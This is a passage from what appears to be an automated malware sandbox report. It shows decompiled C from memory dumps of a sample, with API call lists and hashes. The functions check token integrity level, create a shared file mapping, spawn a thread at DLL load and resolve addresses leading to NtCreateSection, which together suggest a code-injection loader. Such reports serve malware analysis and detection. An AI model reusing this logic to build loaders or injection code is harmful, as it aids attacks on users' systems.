                                                                                                                                                                                                                        				_push(_t12);
                                                                                                                                                                                                                        				_v12 = _t12;
                                                                                                                                                                                                                        				_t13 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t5 = _t13 + 0x26fe836; // 0x4b38dde
                                                                                                                                                                                                                        				_t6 = _t13 + 0x26fe59c; // 0x530025
                                                                                                                                                                                                                        				_push(0x16);
                                                                                                                                                                                                                        				_push( &_v56);
                                                                                                                                                                                                                        				_v8 = _t27;
                                                                                                                                                                                                                        				L026FAB2A();
                                                                                                                                                                                                                        				_t17 = CreateFileMappingW(0xffffffff, 0x26fd2a8, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                                        				_t30 = _t17;
                                                                                                                                                                                                                        				if(_t30 == 0) {
                                                                                                                                                                                                                        					_t28 = GetLastError();
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                        						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                                        							_t28 = GetLastError();
                                                                                                                                                                                                                        							if(_t28 != 0) {
                                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							 *_a4 = _t30;
                                                                                                                                                                                                                        							 *_a8 = _t21;
                                                                                                                                                                                                                        							_t28 = 0;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t28 = 2;
                                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                                        						CloseHandle(_t30);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t28;
                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                        0x026f8492
                                                                                                                                                                                                                        0x026f849a
                                                                                                                                                                                                                        0x026f849e
                                                                                                                                                                                                                        0x026f84a4
                                                                                                                                                                                                                        0x026f84a9
                                                                                                                                                                                                                        0x026f84ae
                                                                                                                                                                                                                        0x026f84b1
                                                                                                                                                                                                                        0x026f84b4
                                                                                                                                                                                                                        0x026f84b9
                                                                                                                                                                                                                        0x026f84ba
                                                                                                                                                                                                                        0x026f84bd
                                                                                                                                                                                                                        0x026f84c2
                                                                                                                                                                                                                        0x026f84c9
                                                                                                                                                                                                                        0x026f84d3
                                                                                                                                                                                                                        0x026f84d5
                                                                                                                                                                                                                        0x026f84d6
                                                                                                                                                                                                                        0x026f84d9
                                                                                                                                                                                                                        0x026f84f5
                                                                                                                                                                                                                        0x026f84fb
                                                                                                                                                                                                                        0x026f84ff
                                                                                                                                                                                                                        0x026f854d
                                                                                                                                                                                                                        0x026f8501
                                                                                                                                                                                                                        0x026f850e
                                                                                                                                                                                                                        0x026f851e
                                                                                                                                                                                                                        0x026f8526
                                                                                                                                                                                                                        0x026f8538
                                                                                                                                                                                                                        0x026f853c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f8528
                                                                                                                                                                                                                        0x026f852b
                                                                                                                                                                                                                        0x026f8530
                                                                                                                                                                                                                        0x026f8532
                                                                                                                                                                                                                        0x026f8532
                                                                                                                                                                                                                        0x026f8510
                                                                                                                                                                                                                        0x026f8512
                                                                                                                                                                                                                        0x026f853e
                                                                                                                                                                                                                        0x026f853f
                                                                                                                                                                                                                        0x026f853f
                                                                                                                                                                                                                        0x026f850e
                                                                                                                                                                                                                        0x026f8554

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,026F1F23,?,?,4D283A53,?,?), ref: 026F849E
                                                                                                                                                                                                                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 026F84B4
                                                                                                                                                                                                                        • _snwprintf.NTDLL ref: 026F84D9
                                                                                                                                                                                                                        • CreateFileMappingW.KERNELBASE(000000FF,026FD2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 026F84F5
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,026F1F23,?,?,4D283A53,?), ref: 026F8507
                                                                                                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 026F851E
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,026F1F23,?,?,4D283A53), ref: 026F853F
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,026F1F23,?,?,4D283A53,?), ref: 026F8547
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1814172918-0
                                                                                                                                                                                                                        • Opcode ID: 635904fa61ce097a06fca9a7d19c8be1c1f6a6a7c28b57a03aa012362154c5e9
                                                                                                                                                                                                                        • Instruction ID: 608e195af66bd099e83af10ed291fa6aff18101dae320eb1062ea4092ac7d4a0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 635904fa61ce097a06fca9a7d19c8be1c1f6a6a7c28b57a03aa012362154c5e9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA21D572A40208BBDFD1EF68DC05F8E37AAAB84750F104161F709E7290E771DA56CB50
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026F4800(long* _a4) {
                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                        				void _v16;
                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_v16 = 1;
                                                                                                                                                                                                                        				_v20 = 0x2000;
                                                                                                                                                                                                                        				if( *0x26fd25c > 5) {
                                                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                                                        					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                                                        						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                                        						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                        						if(_v8 != 0) {
                                                                                                                                                                                                                        							_t46 = E026F6D10(_v8);
                                                                                                                                                                                                                        							if(_t46 != 0) {
                                                                                                                                                                                                                        								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                                                        								if(_t33 != 0) {
                                                                                                                                                                                                                        									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								E026F45B3(_t46);
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						CloseHandle(_v12);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				 *_a4 = _v20;
                                                                                                                                                                                                                        				return _v16;
                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                        0x026f480d
                                                                                                                                                                                                                        0x026f4814
                                                                                                                                                                                                                        0x026f481b
                                                                                                                                                                                                                        0x026f482f
                                                                                                                                                                                                                        0x026f483a
                                                                                                                                                                                                                        0x026f4852
                                                                                                                                                                                                                        0x026f485f
                                                                                                                                                                                                                        0x026f4862
                                                                                                                                                                                                                        0x026f4867
                                                                                                                                                                                                                        0x026f4872
                                                                                                                                                                                                                        0x026f4876
                                                                                                                                                                                                                        0x026f4885
                                                                                                                                                                                                                        0x026f4889
                                                                                                                                                                                                                        0x026f48a5
                                                                                                                                                                                                                        0x026f48a5
                                                                                                                                                                                                                        0x026f48a9
                                                                                                                                                                                                                        0x026f48a9
                                                                                                                                                                                                                        0x026f48ae
                                                                                                                                                                                                                        0x026f48b2
                                                                                                                                                                                                                        0x026f48b8
                                                                                                                                                                                                                        0x026f48b9
                                                                                                                                                                                                                        0x026f48c0
                                                                                                                                                                                                                        0x026f48c6

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 026F4832
                                                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 026F4852
                                                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 026F4862
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 026F48B2
                                                                                                                                                                                                                          • Part of subcall function 026F6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 026F4885
                                                                                                                                                                                                                        • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 026F488D
                                                                                                                                                                                                                        • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 026F489D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1295030180-0
                                                                                                                                                                                                                        • Opcode ID: 749e7ff0e7904d1b9ef1584399090bec56546064bb47551cb8a3d4c2d4c6859a
                                                                                                                                                                                                                        • Instruction ID: e51dd6e35717480b8a7e52a530bf3720f0ae8cc5a616764dd445d44f42347a31
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 749e7ff0e7904d1b9ef1584399090bec56546064bb47551cb8a3d4c2d4c6859a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F213C75D00298FFEF409F94DC84EAEBBB9EF44304F100465EB10A6290CB719A55EF60
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                                                                        			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                        				long _t9;
                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                                        				_t9 = _a8;
                                                                                                                                                                                                                        				_v8 = 1;
                                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                                        					_t10 = InterlockedDecrement(0x2194108);
                                                                                                                                                                                                                        					__eflags = _t10;
                                                                                                                                                                                                                        					if(_t10 == 0) {
                                                                                                                                                                                                                        						__eflags =  *0x219410c;
                                                                                                                                                                                                                        						if( *0x219410c != 0) {
                                                                                                                                                                                                                        							_t36 = 0x2710;
                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                        								SleepEx(0x64, 1);
                                                                                                                                                                                                                        								__eflags =  *0x2194118;
                                                                                                                                                                                                                        								if( *0x2194118 == 0) {
                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                        								__eflags = _t36;
                                                                                                                                                                                                                        								if(_t36 > 0) {
                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							CloseHandle( *0x219410c);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						HeapDestroy( *0x2194110);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					if(_t9 == 1 && InterlockedIncrement(0x2194108) == 1) {
                                                                                                                                                                                                                        						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                        						 *0x2194110 = _t18;
                                                                                                                                                                                                                        						_t41 = _t18;
                                                                                                                                                                                                                        						if(_t18 == 0) {
                                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							 *0x2194130 = _a4;
                                                                                                                                                                                                                        							asm("lock xadd [eax], ebx");
                                                                                                                                                                                                                        							_t23 = CreateThread(0, 0, E02191EFF, E0219122C(_a12, 0, 0x2194118, _t41), 0,  &_a8); // executed
                                                                                                                                                                                                                        							 *0x219410c = _t23;
                                                                                                                                                                                                                        							if(_t23 == 0) {
                                                                                                                                                                                                                        								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                        0x02191818
                                                                                                                                                                                                                        0x02191824
                                                                                                                                                                                                                        0x02191826
                                                                                                                                                                                                                        0x02191829
                                                                                                                                                                                                                        0x021918a3
                                                                                                                                                                                                                        0x021918a9
                                                                                                                                                                                                                        0x021918ab
                                                                                                                                                                                                                        0x021918ad
                                                                                                                                                                                                                        0x021918b3
                                                                                                                                                                                                                        0x021918b5
                                                                                                                                                                                                                        0x021918ba
                                                                                                                                                                                                                        0x021918bd
                                                                                                                                                                                                                        0x021918c8
                                                                                                                                                                                                                        0x021918ca
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021918cc
                                                                                                                                                                                                                        0x021918cf
                                                                                                                                                                                                                        0x021918d1
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021918d1
                                                                                                                                                                                                                        0x021918d9
                                                                                                                                                                                                                        0x021918d9
                                                                                                                                                                                                                        0x021918e5
                                                                                                                                                                                                                        0x021918e5
                                                                                                                                                                                                                        0x0219182b
                                                                                                                                                                                                                        0x0219182c
                                                                                                                                                                                                                        0x0219184c
                                                                                                                                                                                                                        0x02191852
                                                                                                                                                                                                                        0x02191857
                                                                                                                                                                                                                        0x02191859
                                                                                                                                                                                                                        0x02191899
                                                                                                                                                                                                                        0x02191899
                                                                                                                                                                                                                        0x0219185b
                                                                                                                                                                                                                        0x02191863
                                                                                                                                                                                                                        0x0219186a
                                                                                                                                                                                                                        0x02191883
                                                                                                                                                                                                                        0x02191889
                                                                                                                                                                                                                        0x02191890
                                                                                                                                                                                                                        0x02191895
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191895
                                                                                                                                                                                                                        0x02191890
                                                                                                                                                                                                                        0x02191859
                                                                                                                                                                                                                        0x0219182c
                                                                                                                                                                                                                        0x021918f2

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(02194108), ref: 02191837
                                                                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0219184C
                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,02191EFF,00000000,00000000,?), ref: 02191883
                                                                                                                                                                                                                        • InterlockedDecrement.KERNEL32(02194108), ref: 021918A3
                                                                                                                                                                                                                        • SleepEx.KERNEL32(00000064,00000001), ref: 021918BD
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 021918D9
                                                                                                                                                                                                                        • HeapDestroy.KERNEL32 ref: 021918E5
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3416589138-0
                                                                                                                                                                                                                        • Opcode ID: 11e5127e36dfbaaae449f2f55f7e31b7bb979670ad4c47f115be8706b0ae2b12
                                                                                                                                                                                                                        • Instruction ID: b986515bf4a62225caa45844020119130ec86aef65eee2401ed060404af30b2d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11e5127e36dfbaaae449f2f55f7e31b7bb979670ad4c47f115be8706b0ae2b12
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61219F35EC0206BBDB10AFA9EC84A6B7BF9FB956547144939F819E2140D730A8A1AF50
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 026F3E08
                                                                                                                                                                                                                        • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 026F3E8B
                                                                                                                                                                                                                        • StrStrIW.SHLWAPI(00000000,006E0069), ref: 026F3ECB
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 026F3EED
                                                                                                                                                                                                                          • Part of subcall function 026F4B71: SysAllocString.OLEAUT32(026FC298), ref: 026F4BC1
                                                                                                                                                                                                                        • SafeArrayDestroy.OLEAUT32(00000000), ref: 026F3F40
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 026F3F4F
                                                                                                                                                                                                                          • Part of subcall function 026F3B9B: Sleep.KERNELBASE(000001F4), ref: 026F3BE3
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2118684380-0
                                                                                                                                                                                                                        • Opcode ID: 4806ae270c40cbdb6fd2da8f86144810f9072c991a0daf496247ac21e7debddd
                                                                                                                                                                                                                        • Instruction ID: e4a15b4ff1c487cc4bc3f54f0a13aa186980c42a6b7bacc390a1ef13fb2bdc38
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4806ae270c40cbdb6fd2da8f86144810f9072c991a0daf496247ac21e7debddd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73517035900689EFDF41DFA8C844A9EB7B6FF88704B158869EA05DB310DB31ED56CB50
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E02191C1F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                                                                        				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t54 = E0219163D(0x20);
                                                                                                                                                                                                                        				if(_t54 == 0) {
                                                                                                                                                                                                                        					_v8 = 8;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t48 = GetModuleHandleA( *0x2194144 + 0x2195014);
                                                                                                                                                                                                                        					_v8 = 0x7f;
                                                                                                                                                                                                                        					_t28 = GetProcAddress(_t48,  *0x2194144 + 0x219514c);
                                                                                                                                                                                                                        					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                        					if(_t28 == 0) {
                                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                                        						E02191628(_t54);
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t32 = GetProcAddress(_t48,  *0x2194144 + 0x219515c);
                                                                                                                                                                                                                        						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                                        							goto L8;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t35 = GetProcAddress(_t48,  *0x2194144 + 0x219516f);
                                                                                                                                                                                                                        							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                        							if(_t35 == 0) {
                                                                                                                                                                                                                        								goto L8;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_t38 = GetProcAddress(_t48,  *0x2194144 + 0x2195184);
                                                                                                                                                                                                                        								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                        								if(_t38 == 0) {
                                                                                                                                                                                                                        									goto L8;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									_t41 = GetProcAddress(_t48,  *0x2194144 + 0x219519a);
                                                                                                                                                                                                                        									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                        									if(_t41 == 0) {
                                                                                                                                                                                                                        										goto L8;
                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                        										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                        										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                        										_t44 = E02191E57(_t54, _a8); // executed
                                                                                                                                                                                                                        										_v8 = _t44;
                                                                                                                                                                                                                        										if(_t44 != 0) {
                                                                                                                                                                                                                        											goto L8;
                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                        											 *_a12 = _t54;
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                        0x02191c2e
                                                                                                                                                                                                                        0x02191c32
                                                                                                                                                                                                                        0x02191cf4
                                                                                                                                                                                                                        0x02191c38
                                                                                                                                                                                                                        0x02191c50
                                                                                                                                                                                                                        0x02191c5f
                                                                                                                                                                                                                        0x02191c66
                                                                                                                                                                                                                        0x02191c68
                                                                                                                                                                                                                        0x02191c6d
                                                                                                                                                                                                                        0x02191cec
                                                                                                                                                                                                                        0x02191ced
                                                                                                                                                                                                                        0x02191c6f
                                                                                                                                                                                                                        0x02191c7c
                                                                                                                                                                                                                        0x02191c7e
                                                                                                                                                                                                                        0x02191c83
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191c85
                                                                                                                                                                                                                        0x02191c92
                                                                                                                                                                                                                        0x02191c94
                                                                                                                                                                                                                        0x02191c99
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191c9b
                                                                                                                                                                                                                        0x02191ca8
                                                                                                                                                                                                                        0x02191caa
                                                                                                                                                                                                                        0x02191caf
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191cb1
                                                                                                                                                                                                                        0x02191cbe
                                                                                                                                                                                                                        0x02191cc0
                                                                                                                                                                                                                        0x02191cc5
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191cc7
                                                                                                                                                                                                                        0x02191ccd
                                                                                                                                                                                                                        0x02191cd2
                                                                                                                                                                                                                        0x02191cd9
                                                                                                                                                                                                                        0x02191cde
                                                                                                                                                                                                                        0x02191ce3
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191ce5
                                                                                                                                                                                                                        0x02191ce8
                                                                                                                                                                                                                        0x02191ce8
                                                                                                                                                                                                                        0x02191ce3
                                                                                                                                                                                                                        0x02191cc5
                                                                                                                                                                                                                        0x02191caf
                                                                                                                                                                                                                        0x02191c99
                                                                                                                                                                                                                        0x02191c83
                                                                                                                                                                                                                        0x02191c6d
                                                                                                                                                                                                                        0x02191d02

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0219163D: HeapAlloc.KERNEL32(00000000,?,0219191A,00000208,?,-00000008,?,?,?,02191F72,?), ref: 02191649
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,0219117B,?,?,?,?,00000002,?,?), ref: 02191C44
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0219117B,?,?,?,?,00000002), ref: 02191C66
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0219117B,?,?,?,?,00000002), ref: 02191C7C
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0219117B,?,?,?,?,00000002), ref: 02191C92
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0219117B,?,?,?,?,00000002), ref: 02191CA8
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0219117B,?,?,?,?,00000002), ref: 02191CBE
                                                                                                                                                                                                                          • Part of subcall function 02191E57: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 02191EB4
                                                                                                                                                                                                                          • Part of subcall function 02191E57: memset.NTDLL ref: 02191ED6
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1632424568-0
                                                                                                                                                                                                                        • Opcode ID: 93d456dd58b9b39d44f465f874e1a3486045f7bc86391b2cea248a4a3823da6a
                                                                                                                                                                                                                        • Instruction ID: 1b50770660f2f9645f1c2f9a8c49454acd3d967744a35d752fe830f934bb796a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93d456dd58b9b39d44f465f874e1a3486045f7bc86391b2cea248a4a3823da6a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9213BB0A4060BBFDB21DFA9C884E5BB7ECEF047057054825E919D7211E770EA85CF68
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 54%
                                                                                                                                                                                                                        			E026FA5F5(char* __eax) {
                                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                                        				char* _t21;
                                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                                        				char* _t24;
                                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t21 = __eax;
                                                                                                                                                                                                                        				_push(0x20);
                                                                                                                                                                                                                        				_t23 = 1;
